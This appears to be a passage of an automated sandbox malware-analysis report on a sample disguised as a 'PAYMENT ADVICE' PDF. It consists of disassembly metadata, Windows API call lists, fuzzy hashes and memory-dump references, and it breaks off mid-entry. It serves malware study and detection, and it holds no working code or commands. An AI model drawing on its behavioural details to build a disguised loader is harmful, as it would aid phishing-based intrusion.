                                                                                                                • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                                APIs
                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                                • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2667972263-0
                                                                                                                • Opcode ID: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
                                                                                                                • Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
                                                                                                                • Opcode Fuzzy Hash: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
                                                                                                                • Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8
                                                                                                                APIs
                                                                                                                • CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                                • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                • CharNextW.USER32(0040A300,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                                • CharPrevW.USER32(0040A300,0040A300,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Char$Next$Prev
                                                                                                                • String ID: *?|<>/":
                                                                                                                • API String ID: 589700163-165019052
                                                                                                                • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                                • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                                APIs
                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017A8
                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017CD
                                                                                                                  • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                  • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
                                                                                                                  • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                • String ID:
                                                                                                                • API String ID: 1941528284-0
                                                                                                                • Opcode ID: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                                • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                                • Opcode Fuzzy Hash: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                                • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1912718029-0
                                                                                                                • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                                • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1849352358-0
                                                                                                                • Opcode ID: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                                • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                                • Opcode Fuzzy Hash: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                                • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                                APIs
                                                                                                                • GetDC.USER32(?), ref: 00401D59
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 3808545654-0
                                                                                                                • Opcode ID: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
                                                                                                                • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                                • Opcode Fuzzy Hash: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
                                                                                                                • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                • wsprintfW.USER32 ref: 00404A1A
                                                                                                                • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                • String ID: %u.%u%s%s
                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                • Opcode ID: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                                • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                                • Opcode Fuzzy Hash: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                                • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                                APIs
                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                • String ID: !
                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                                • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                                APIs
                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                • wsprintfW.USER32 ref: 00406411
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00406421
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                • String ID: %s%S.dll
                                                                                                                • API String ID: 2200240437-2744773210
                                                                                                                • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                                • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                                APIs
                                                                                                                • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                • lstrlenW.KERNEL32(0040B5F0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateValuelstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1356686001-0
                                                                                                                • Opcode ID: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
                                                                                                                • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                                • Opcode Fuzzy Hash: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
                                                                                                                • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                  • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
                                                                                                                  • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                  • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                  • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                • String ID:
                                                                                                                • API String ID: 3585118688-0
                                                                                                                • Opcode ID: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                                • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                                • Opcode Fuzzy Hash: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                                • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                                APIs
                                                                                                                • CreateDirectoryW.KERNEL32(?,0040A300,00441800), ref: 004056C6
                                                                                                                • GetLastError.KERNEL32 ref: 004056DA
                                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                                • GetLastError.KERNEL32 ref: 004056F9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                • String ID:
                                                                                                                • API String ID: 3449924974-0
                                                                                                                • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                                • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(?,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                                • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                • String ID:
                                                                                                                • API String ID: 2102729457-0
                                                                                                                • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                                • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                                APIs
                                                                                                                • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                                  • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                • String ID:
                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                                • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                                APIs
                                                                                                                • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                                • GetTempFileNameW.KERNEL32(0040A300,?,00000000,?,?,?,00000000,0040329E,00441000,00441800,00441800,00441800,00441800,00441800,00441800,004034CC), ref: 00405C92
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                • String ID: nsa
                                                                                                                • API String ID: 1716503409-2209301699
                                                                                                                • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
